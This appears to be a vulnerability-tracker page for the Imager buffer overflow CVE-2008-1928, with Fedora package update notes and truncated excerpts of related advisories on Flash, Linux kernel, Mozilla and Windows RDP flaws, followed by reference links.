Common Vulnerabilities and Exposures assigned an identifier CVE-2008-1928 to the following vulnerability:
Buffer overflow in Imager 0.42 through 0.63 allows attackers to cause
a denial of service (crash) via an image based fill in which the
number of input channels is different from the number of output
channels.
References:
http://rt.cpan.org/Public/Bug/Display.html?id=35324
Discussion:
perl-Imager-0.64-2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
---
perl-Imager-0.64-2.fc7 has been submitted as an update for Fedora 7
---
perl-Imager-0.64-2.fc7 has been pushed to the Fedora 7 stable repository. If p
Bugzilla
CVE-2008-1654 Flash Player cross domain HTTP header flaw
bugzilla·2008-04-04·CVSS 4.3
CVE-2008-1654 [MEDIUM] CVE-2008-1654 Flash Player cross domain HTTP header flaw
CVE-2008-1654 Flash Player cross domain HTTP header flaw
Adobe Flash Player 9.0.124.0 adds a new feature to perform a cross-domain policy
file check before allowing a SWF file to send HTTP headers to a different domain.
Discussion:
Public now via:
http://www.adobe.com/support/security/bulletins/apsb08-11.html
Lifting embargo.
---
This issue was addressed in:
Red Hat Enterprise Linux Extras:
http://rhn.redhat.com/errata/RHSA-2008-0221.html
Bugzilla
CVE-2008-1367 Kernel doesn't clear DF for signal handlers
bugzilla·2008-03-13·CVSS 7.5
CVE-2008-1367 [HIGH] CVE-2008-1367 Kernel doesn't clear DF for signal handlers
CVE-2008-1367 Kernel doesn't clear DF for signal handlers
Description of problem:
Jake Edge has reported the following gcc kernel related potential
security issue on LWN:
A change to GCC for a recent release coupled with a kernel bug has created a
messy situation, with possible security implications. GCC changed some
assumptions about x86 processor flags, in accordance with the ABI standard, that
can lead to memory corruption for programs built with GCC 4.3.0. No one has come
up with a way to exploit the flaw, at least yet, but it clearly is a problem
that needs to be addressed.
The problem revolves around the x86 direction flag (DF), which governs whether
block memory operations operate forward through memory or backwards. The main
use for the flag is to support overlapping memory co
Bugzilla
CVE-2008-0591 Mozilla information disclosure flaw
bugzilla·2008-02-06·CVSS 4.3
CVE-2008-0591 [MEDIUM] CVE-2008-0591 Mozilla information disclosure flaw
CVE-2008-0591 Mozilla information disclosure flaw
CVE-2008-0591 describes an information disclosure bug in the Mozilla
products. It is possible that this flaw could be used by malicious web
content to trick a user into allowing the site to steal information about a
users browsing session.
Discussion:
seamonkey-1.1.8-1.fc7 has been submitted as an update for Fedora 7
---
seamonkey-1.1.8-1.fc8 has been submitted as an update for Fedora 8
---
blam-1.8.3-13.fc8,chmsee-1.0.0-1.28.fc8,devhelp-0.16.1-5.fc8,epiphany-2.20.2-3.fc8,epiphany-extensions-2.20.1-5.fc8,firefox-2.0.0.12-1.fc8,galeon-2.0.4-1.fc8.2,gnome-python2-extras-2.19.1-12.fc8,gnome-web-photo-0.3-8.fc8,gtkmozembedmm-1.4.2.cvs20060817-18.fc8,kazehakase-0.5.2-1.fc8.2,liferea-1.4.11-2.fc8,Miro-1.1-3.fc8,openvrml-0.17.5-2.fc8,ruby-g
Krebs
Microsoft Patches ‘Wormable’ Flaw in Windows XP, 7 and Windows 2003
blogs_krebs·2019-05-14·CVSS 9.8
CVE-2019-0708 [CRITICAL] Microsoft Patches ‘Wormable’ Flaw in Windows XP, 7 and Windows 2003
Microsoft today is taking the unusual step of releasing security updates for unsupported but still widely-used Windows operating systems like XP and Windows 2003 , citing the discovery of a “wormable” flaw that the company says could be used to fuel a fast-moving malware threat like the WannaCry ransomware attacks of 2017.
The May 2017 global malware epidemic WannaCry affected some 200,000 Windows systems in 150 countries. Source: Wikipedia.
The vulnerability ( CVE-2019-0708 ) resides in the “remote desktop services” component built into supported versions of Windows, including Windows 7 , Windows Server 2008 R2 , and Windows Server 2008 . It also is present in computers powered by Windows XP and Windows 2003, operating systems for which Microsoft long ago stopped shipping security updat
http://secunia.com/advisories/29952http://securityreason.com/securityalert/3849http://www.securityfocus.com/archive/1/491281/100/0/threadedhttp://www.securityfocus.com/bid/28925http://www.vupen.com/english/advisories/2008/1368/referenceshttp://secunia.com/advisories/29952http://securityreason.com/securityalert/3849http://www.securityfocus.com/archive/1/491281/100/0/threadedhttp://www.securityfocus.com/bid/28925http://www.vupen.com/english/advisories/2008/1368/references
2008-04-29
Published